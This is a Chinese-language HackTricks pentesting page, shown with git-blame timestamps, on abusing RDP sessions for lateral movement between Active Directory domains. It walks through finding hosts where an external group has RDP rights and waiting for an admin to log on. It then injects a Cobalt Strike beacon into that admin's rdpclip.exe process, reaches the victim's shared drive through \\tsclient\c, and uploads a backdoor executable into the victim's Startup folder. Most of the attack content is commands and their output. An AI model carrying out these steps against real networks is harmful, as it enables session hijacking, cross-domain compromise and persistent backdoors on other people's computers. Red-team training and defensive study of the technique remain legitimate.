2024-01-09 14:10:19 +00:00
|
|
|
|
# RDP 会话滥用
|
2022-08-16 00:18:24 +00:00
|
|
|
|
|
|
|
|
|
|
<details>
|
|
|
|
|
|
|
2024-02-09 01:27:24 +00:00
|
|
|
|
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS 红队专家)</strong></a><strong>!</strong></summary>
|
2022-08-16 00:18:24 +00:00
|
|
|
|
|
2024-01-09 14:10:19 +00:00
|
|
|
|
支持 HackTricks 的其他方式:
|
2022-08-16 00:18:24 +00:00
|
|
|
|
|
2024-02-09 01:27:24 +00:00
|
|
|
|
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
|
|
|
|
|
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
|
|
|
|
|
|
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFT**](https://opensea.io/collection/the-peass-family)收藏品
|
|
|
|
|
|
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live) 上 **关注**我们**。**
|
|
|
|
|
|
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来**分享您的黑客技巧**。
|
2022-08-16 00:18:24 +00:00
|
|
|
|
|
|
|
|
|
|
</details>
|
|
|
|
|
|
|
2024-01-09 14:10:19 +00:00
|
|
|
|
## RDP 进程注入
|
2022-08-16 00:18:24 +00:00
|
|
|
|
|
2024-02-09 01:27:24 +00:00
|
|
|
|
如果**外部组**在当前域中的任何**计算机**上具有**RDP 访问权限**,**攻击者**可以**入侵该计算机并等待用户**。
|
2022-08-16 00:18:24 +00:00
|
|
|
|
|
2024-02-09 01:27:24 +00:00
|
|
|
|
一旦用户通过 RDP 访问,**攻击者可以转向该用户的会话**并滥用其在外部域中的权限。
|
2022-08-16 00:18:24 +00:00
|
|
|
|
```powershell
|
|
|
|
|
|
# Supposing the group "External Users" has RDP access in the current domain
|
|
|
|
|
|
## lets find where they could access
|
|
|
|
|
|
## The easiest way would be with bloodhound, but you could also run:
|
|
|
|
|
|
Get-DomainGPOUserLocalGroupMapping -Identity "External Users" -LocalGroup "Remote Desktop Users" | select -expand ComputerName
|
|
|
|
|
|
#or
|
|
|
|
|
|
Find-DomainLocalGroupMember -GroupName "Remote Desktop Users" | select -expand ComputerName
|
|
|
|
|
|
|
|
|
|
|
|
# Then, compromise the listed machines, and wait til someone from the external domain logs in:
|
|
|
|
|
|
net logons
|
|
|
|
|
|
Logged on users at \\localhost:
|
|
|
|
|
|
EXT\super.admin
|
|
|
|
|
|
|
|
|
|
|
|
# With cobalt strike you could just inject a beacon inside of the RDP process
|
|
|
|
|
|
beacon> ps
|
2023-08-03 19:12:22 +00:00
|
|
|
|
PID PPID Name Arch Session User
|
|
|
|
|
|
--- ---- ---- ---- ------- -----
|
|
|
|
|
|
...
|
|
|
|
|
|
4960 1012 rdpclip.exe x64 3 EXT\super.admin
|
2022-08-16 00:18:24 +00:00
|
|
|
|
|
|
|
|
|
|
beacon> inject 4960 x64 tcp-local
|
|
|
|
|
|
## From that beacon you can just run powerview modules interacting with the external domain as that user
|
|
|
|
|
|
```
|
2024-02-09 01:27:24 +00:00
|
|
|
|
查看**本页中使用其他工具窃取会话的其他方法** [**在此页面中。**](../../network-services-pentesting/pentesting-rdp.md#session-stealing)
|
2022-08-16 00:18:24 +00:00
|
|
|
|
|
|
|
|
|
|
## RDPInception
|
|
|
|
|
|
|
2024-02-09 01:27:24 +00:00
|
|
|
|
如果用户通过**RDP访问**一台**等待攻击者**的机器,攻击者将能够**在用户的RDP会话中注入一个信标**,如果**受害者在通过RDP访问时挂载了他的驱动器**,**攻击者可以访问它**。
|
2022-08-16 00:18:24 +00:00
|
|
|
|
|
2024-02-09 01:27:24 +00:00
|
|
|
|
在这种情况下,您可以通过在**启动文件夹**中写入**后门**来**妥协受害者的原始计算机**。
|
2022-08-16 00:18:24 +00:00
|
|
|
|
```powershell
|
|
|
|
|
|
# Wait til someone logs in:
|
|
|
|
|
|
net logons
|
|
|
|
|
|
Logged on users at \\localhost:
|
|
|
|
|
|
EXT\super.admin
|
|
|
|
|
|
|
|
|
|
|
|
# With cobalt strike you could just inject a beacon inside of the RDP process
|
|
|
|
|
|
beacon> ps
|
2023-08-03 19:12:22 +00:00
|
|
|
|
PID PPID Name Arch Session User
|
|
|
|
|
|
--- ---- ---- ---- ------- -----
|
|
|
|
|
|
...
|
|
|
|
|
|
4960 1012 rdpclip.exe x64 3 EXT\super.admin
|
2022-08-16 00:18:24 +00:00
|
|
|
|
|
|
|
|
|
|
beacon> inject 4960 x64 tcp-local
|
|
|
|
|
|
|
|
|
|
|
|
# There's a UNC path called tsclient which has a mount point for every drive that is being shared over RDP.
|
|
|
|
|
|
## \\tsclient\c is the C: drive on the origin machine of the RDP session
|
|
|
|
|
|
beacon> ls \\tsclient\c
|
|
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
Size Type Last Modified Name
|
|
|
|
|
|
---- ---- ------------- ----
|
|
|
|
|
|
dir 02/10/2021 04:11:30 $Recycle.Bin
|
|
|
|
|
|
dir 02/10/2021 03:23:44 Boot
|
|
|
|
|
|
dir 02/20/2021 10:15:23 Config.Msi
|
|
|
|
|
|
dir 10/18/2016 01:59:39 Documents and Settings
|
|
|
|
|
|
[...]
|
2022-08-16 00:18:24 +00:00
|
|
|
|
|
|
|
|
|
|
# Upload backdoor to startup folder
|
|
|
|
|
|
beacon> cd \\tsclient\c\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
|
|
|
|
|
|
beacon> upload C:\Payloads\pivot.exe
|
|
|
|
|
|
```
|
|
|
|
|
|
<details>
|
|
|
|
|
|
|
2024-02-09 01:27:24 +00:00
|
|
|
|
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
2022-08-16 00:18:24 +00:00
|
|
|
|
|
2024-01-09 14:10:19 +00:00
|
|
|
|
支持HackTricks的其他方式:
|
2022-08-16 00:18:24 +00:00
|
|
|
|
|
2024-02-09 01:27:24 +00:00
|
|
|
|
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
|
|
|
|
|
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
|
|
|
|
|
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
|
|
|
|
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
|
|
|
|
|
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
2022-08-16 00:18:24 +00:00
|
|
|
|
|
|
|
|
|
|
</details>
|
